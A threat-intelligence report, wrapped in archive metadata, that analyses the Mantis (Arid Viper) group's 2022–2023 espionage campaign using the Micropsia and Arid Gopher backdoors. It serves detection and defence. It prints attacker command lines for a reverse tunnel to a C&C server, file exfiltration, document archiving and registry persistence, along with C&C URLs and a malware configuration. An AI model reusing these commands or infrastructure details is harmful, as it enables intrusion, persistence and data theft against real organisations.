{ "id": "0a85d20e-9063-413b-812c-2f4a31b05d7f", "created_at": "2026-04-06T00:09:25.883046Z", "updated_at": "2026-04-10T13:11:49.532974Z", "deleted_at": null, "sha1_hash": "36a4bd06471d80d2789f30bdd2f92f44a6634cc6", "title": "Mantis: New Tooling Used in Attacks Against Palestinian Targets", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 71699, "plain_text": "Mantis: New Tooling Used in Attacks Against Palestinian Targets\r\nBy About the Author\r\nArchived: 2026-04-05 15:12:39 UTC\r\nThe Mantis cyber-espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be\r\noperating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going\r\nto great lengths to maintain a persistent presence on targeted networks.\r\nWhile the group is known for targeting organizations in the Middle East, the most recent campaign uncovered by\r\nSymantec, by Broadcom Software, focused on organizations within the Palestinian territories, with malicious\r\nactivity beginning in September 2022 and continuing to at least February 2023. This targeting is not\r\nunprecedented for Mantis and Symantec previously uncovered attacks against individuals located in the\r\nPalestinian territories during 2017.\r\nBackground\r\nMantis has been active since at least 2014, with some third-party reporting suggesting it may have been active as\r\nearly as 2011. The group is known to target organizations in Israel and a number of other Middle Eastern\r\ncountries. Sectors targeted include government, military, financial, media, education, energy, and think tanks. The\r\ngroup is known for employing spear-phishing emails and fake social media profiles to lure targets into installing\r\nmalware on their devices.\r\nMantis is widely accepted to be linked to the Palestinian territories. While other vendors have linked the group to\r\nHamas, Symantec cannot make a definitive attribution to any Palestinian organization.\r\nIn its most recent attacks, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to\r\ncompromise targets before engaging in extensive credential theft and exfiltration of stolen data.\r\nAttack chain\r\nThe initial infection vector for this campaign remains unknown. In one organization targeted, a feature of the\r\ncompromise was that the attackers deployed three distinct versions of the same toolset (i.e. different variants of\r\nthe same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a\r\nprecautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the\r\ntarget’s network.\r\nThe following is a description of how one of those three toolsets was used:\r\nThe first evidence of malicious activity occurred on December 18, 2022. Three distinct sets of obfuscated\r\nPowerShell commands were executed to load a Base64-encoded string, which started embedded shellcode. The\r\nshellcode was a 32-bit stager that downloaded another stage using basic TCP-based protocol from a command-and-control (C\u0026C) server: 104.194.222[.]50 port 4444.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nPage 1 of 6\n\nThe attackers returned on December 19 to dump credentials before downloading the Micropsia backdoor and\r\nPutty, a publicly available SSH client, using Certutil and BITSAdmin\r\nMicropsia subsequently executed and initiated contact with a C\u0026C server. On the same day, Micropsia also\r\nexecuted on three other machines in the same organization. In each case, it ran in a folder named after its file\r\nname:\r\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\r\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\r\ncsidl_common_appdata\\windowsps\\windowsps.exe\r\nOn one computer, Micropsia was used to set up a reverse socks tunnel to an external IP address:\r\nCSIDL_COMMON_APPDATA\\windowsservicemanageav\\windowsservicemanageav.exe -connect\r\n104.194.222[.]50:443 [REDACTED]\r\nOn December 20, Micropsia was used to run an unknown executable named windowspackages.exe on one of the\r\ninfected computers.\r\nThe following day, December 21, RAR was executed to archive files on another infected computer.\r\nBetween December 22 and January 2, 2023, Micropsia was used to execute the Arid Gopher backdoor on three\r\ninfected computers. Arid Gopher was in turn used to run a tool called SetRegRunKey.exe that provided\r\npersistence by adding Arid Gopher to the registry so that it executed on reboot. It also ran an unknown file named\r\nlocalsecuritypolicy.exe (this file name was used for the Arid Gopher backdoor elsewhere by the attackers).\r\nOn December 28, Micropsia was used to run windowspackages.exe on three more infected computers.\r\nOn December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and\r\nnetworkuefidiagsbootserver.exe on two of the infected computers.\r\nOn January 2, the attackers retired the version of Arid Gopher they were using and introduced a new variant.\r\nWhether this was because the first version was discovered or whether it was standard operating procedure is\r\nunclear.\r\nOn January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, on a single\r\ncomputer from the folder: csidl_common_appdata\\hostupbroker\\hostupbroker.exe. This was immediately followed\r\nby the exfiltration of a RAR file:\r\nCSIDL_COMMON_APPDATA\\windowsupserv\\windowsupserv.exe -f\r\nCSIDL_COMMON_APPDATA\\windowspackages\\01-04-2023-15-13-39_getf.rar\r\nOn January 9, Arid Gopher was used to execute two unknown files on a single computer:\r\ncsidl_common_appdata\\teamviewrremoteservice\\teamviewrremoteservice.exe\r\ncsidl_common_appdata\\embededmodeservice\\embededmodeservice.exe\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nPage 2 of 6\n\nThe last malicious activity occurred from January 12 onwards when Arid Gopher was used to execute the\r\nunknown file named localsecuritypolicy.exe every ten hours.\r\nMicropsia\r\nVariants of the Micropsia backdoor used in these attacks appear to be slightly updated versions of those seen by\r\nother vendors. In this campaign, Micropsia was deployed using multiple file names and file paths:\r\ncsidl_common_appdata\\microsoft\\dotnet35\\microsoftdotnet35.exe\r\ncsidl_common_appdata\\microsoftservicesusermanual\\systempropertiesinternationaltime.exe\r\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\r\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\r\ncsidl_common_appdata\\windowsps\\windowsps.exe\r\nMicropsia is executed using WMI and its main purpose appears to be running secondary payloads for the\r\nattackers. These included:\r\nArid Gopher (file names: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe,\r\nnetworkvirtualizationseoservice.exe)\r\nReverse SOCKs Tunneler (aka Revsocks) (file name: windowsservicemanageav.exe)\r\nData Exfiltration Tool (file name: windowsupserv.exe)\r\nTwo unknown files, both named hostupbroker.exe\r\nUnknown file named windowspackages.exe\r\nIn addition to this, Micropsia has its own functionality, such as taking screenshots, keylogging, and archiving\r\ncertain file types using WinRAR in preparation for data exfiltration:\r\n\"%PROGRAMDATA%\\Software Distributions\\WinRAR\\Rar.exe\" a -r -ep1 -v2500k -\r\nhp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14\r\n\"%PROGRAMDATA%\\Software Distributions\\Bdl\\LMth__C_2023-02-13 17-14-41\" \"%USERPROFILE%\\*.xls\"\r\n\"%USERPROFILE%\\*.xlsx\" \"%USERPROFILE%\\*.doc\" \"%USERPROFILE%\\*.docx\"\r\n\"%USERPROFILE%\\*.csv\" \"%USERPROFILE%\\*.pdf\" \"%USERPROFILE%\\*.ppt\"\r\n\"%USERPROFILE%\\*.pptx\" \"%USERPROFILE%\\*.odt\" \"%USERPROFILE%\\*.mdb\"\r\n\"%USERPROFILE%\\*.accdb\" \"%USERPROFILE%\\*.accde\" \"%USERPROFILE%\\*.txt\"\r\n\"%USERPROFILE%\\*.rtf\" \"%USERPROFILE%\\*.vcf\"\r\nArid Gopher\r\nUnlike Micropsia, which is written in Delphi, Arid Gopher is written in Go. Versions of Arid Gopher used in this\r\ncampaign contain the following embedded components:\r\n7za.exe – A copy of the legitimate 7-Zip executable\r\nAttestationWmiProvider.exe – A tool that sets a “run” registry value\r\nServiceHubIdentityHost.exe – A copy of legitimate Shortcut.exe executable from Optimum X\r\nSetup.env – Configuration file\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nPage 3 of 6\n\nArid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe,\r\nlocalsecuritypolicy.exe, and networkuefidiagsbootserver.exe, in addition to being used to download and execute\r\nfiles obfuscated with PyArmor.\r\nWhen communicating with a C\u0026C server, Arid Gopher registers a device on one path then connects to another\r\npath, likely to receive commands:\r\nConnects to: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP:\r\n79.133.51[.]134) - likely to register device\r\nFollowed by: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - likely to\r\nreceive commands\r\nConnects to: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32)\r\n- likely to register device\r\nFollowed by: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - likely to receive\r\ncommands\r\nArid Gopher appears to be regularly updated and rewritten by the attackers, most likely in order to evade\r\ndetection. One variant of the malware was radically different from previous versions seen with most of the\r\ndistinctive code updated, so much so that there was not a single subroutine that contained identical distinctive\r\ncode when compared with the previous version. Mantis appeared to be aggressively mutating the logic between\r\nvariants, which is a time-intensive operation if done manually.\r\nThe embedded setup.env file used by one analyzed variant of Arid Gopher to retrieve configuration data contained\r\nthe following:\r\nDIR=WindowsPerceptionService\r\nENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER\r\nLOGS=logs.txt\r\nDID=code.txt\r\nVER=6.1\r\nEN=2\r\nST_METHOD=r\r\nST_MACHINE=false\r\nST_FLAGS=x\r\nCOMPRESSOR=7za.exe\r\nDDIR=ResourcesFiles\r\nBW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nPage 4 of 6\n\nSERVER_TOKEN=PDqMKZ91l2XDmDELOrKB\r\nSTAPP=AttestationWmiProvider.exe\r\nSHORT_APP=ServiceHubIdentityHost.exe\r\nThe setup.env configuration file mentions another file, AttestationWmiProvider.exe, which is also embedded in\r\nArid Gopher. The file is a 32-bit executable that is used as a helper to ensure that another executable will run on\r\nreboot. When it executes, it checks for the following command-line arguments:\r\n\"key\" with string parameter [RUN_VALUE_NAME]\r\n\"value\" with string parameter [RUN_PATHNAME]\r\nIt then arranges to receive notification on a signal using func os/signal.Notify(). Once notified, it sets the\r\nfollowing registry value:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RUN_VALUE_NAME]\" = \"\r\n[RUN_PATHNAME]\"\r\nOur investigation so far shows this file setting Arid Gopher to run on reboot:\r\nCSIDL_COMMON_APPDATA\\attestationwmiprovider\\attestationwmiprovider.exe -\r\nkey=NetworkVirtualizationStartService \"-\r\nvalue=CSIDL_COMMON_APPDATA\\networkvirtualizationstartservice\\networkvirtualizationstartservice.exe -x\"\r\nExfiltration Tool\r\nThe attackers also used a custom tool to exfiltrate data stolen from targeted organizations: a 64-bit PyInstaller\r\nexecutable named WindowsUpServ.exe. When run, the tool checks for the following command-line arguments: \r\n\"-d\" \"[FILE_DIRECTORY]\"\r\n\"-f\" \"[FILENAME]\"\r\nFor each \"-f\" \"[FILENAME]\" command-line argument, the tool uploads the content of [FILENAME]. For each \"-\r\nd\" \"[FILE_DIRECTORY]\" command-line argument, the tool obtains a list of files stored in the\r\nfolder [FILE_DIRECTORY] and uploads the content of each file.\r\nWhen uploading each file, the tools sends an HTTP POST request to a C\u0026C server with the following parameters:\r\n\"kjdfnqweb\": [THE_FILE_CONTENT]\r\n\"qyiwekq\": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]\r\nWhenever the remote server responds with the status code 200, the malware deletes the uploaded file from the\r\nlocal disk. The malware may also log some of its actions in the following files:\r\n\"C:\\ProgramData\\WindowsUpServ\\success.txt\"\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nPage 5 of 6\n\n\"C:\\ProgramData\\WindowsUpServ\\err.txt\"\r\nDetermined Adversary\r\nMantis appears to be a determined adversary, willing to put time and effort into maximizing its chances of success,\r\nas evidenced by extensive malware rewriting and its decision to compartmentalize attacks against single\r\norganizations into multiple separate strands to reduce the chances of the entire operation being detected.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks" ], "report_names": [ "mantis-palestinian-attacks" ], "threat_actors": [ { "id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d", "created_at": "2022-10-25T16:07:23.539852Z", "updated_at": "2026-04-10T02:00:04.647734Z", "deleted_at": null, "main_name": "Desert Falcons", "aliases": [ "APT-C-23", "ATK 66", "Arid Viper", "Niobium", "Operation Arid Viper", "Operation Bearded Barbie", "Operation Rebound", "Pinstripe Lightning", "Renegade Jackal", "TAG-63", "TAG-CT1", "Two-tailed Scorpion" ], "source_name": "ETDA:Desert Falcons", "tools": [ "AridSpy", "Barb(ie) Downloader", "BarbWire", "Desert Scorpion", "FrozenCell", "GlanceLove", "GnatSpy", "KasperAgent", "Micropsia", "PyMICROPSIA", "SpyC23", "Viper RAT", "ViperRAT", "VolatileVenom", "WinkChat", "android.micropsia" ], "source_id": "ETDA", "reports": null }, { "id": "b1979c55-037a-415f-b0a3-cab7933f5cd4", "created_at": "2024-04-24T02:00:49.561432Z", "updated_at": "2026-04-10T02:00:05.416794Z", "deleted_at": null, "main_name": "APT-C-23", "aliases": [ "APT-C-23", "Arid Viper", "Desert Falcon", "TAG-63", "Grey Karkadann", "Big Bang APT", "Two-tailed Scorpion" ], "source_name": "MITRE:APT-C-23", "tools": [ "Micropsia" ], "source_id": "MITRE", "reports": null }, { "id": "929d794b-0e1d-4d10-93a6-29408a527cc2", "created_at": "2023-01-06T13:46:38.70844Z", "updated_at": "2026-04-10T02:00:03.075002Z", "deleted_at": null, "main_name": "AridViper", "aliases": [ "Desert Falcon", "Arid Viper", "APT-C-23", "Bearded Barbie", "Two-tailed Scorpion" ], "source_name": "MISPGALAXY:AridViper", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b", "created_at": "2025-08-07T02:03:24.53077Z", "updated_at": "2026-04-10T02:00:03.680525Z", "deleted_at": null, "main_name": "ALUMINUM SARATOGA", "aliases": [ "APT-C-23", "Arid Viper", "Desert Falcon", "Extreme Jackal ", "Gaza Cybergang", "Molerats ", "Operation DustySky ", "TA402" ], "source_name": "Secureworks:ALUMINUM SARATOGA", "tools": [ "BlackShades", "BrittleBush", "DarkComet", "LastConn", "Micropsia", "NimbleMamba", "PoisonIvy", "QuasarRAT", "XtremeRat" ], "source_id": "Secureworks", "reports": null }, { "id": "35b3e533-7483-4f07-894e-2bb3ac855207", "created_at": "2025-08-07T02:03:24.540035Z", "updated_at": "2026-04-10T02:00:03.69627Z", "deleted_at": null, "main_name": "ALUMINUM SHADYSIDE", "aliases": [ "APT-C-23 ", "Arid Viper ", "Desert Falcon " ], "source_name": "Secureworks:ALUMINUM SHADYSIDE", "tools": [ "Micropsia", "SpyC23" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434165, "ts_updated_at": 1775826709, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/36a4bd06471d80d2789f30bdd2f92f44a6634cc6.pdf", "text": "https://archive.orkl.eu/36a4bd06471d80d2789f30bdd2f92f44a6634cc6.txt", "img": "https://archive.orkl.eu/36a4bd06471d80d2789f30bdd2f92f44a6634cc6.jpg" } }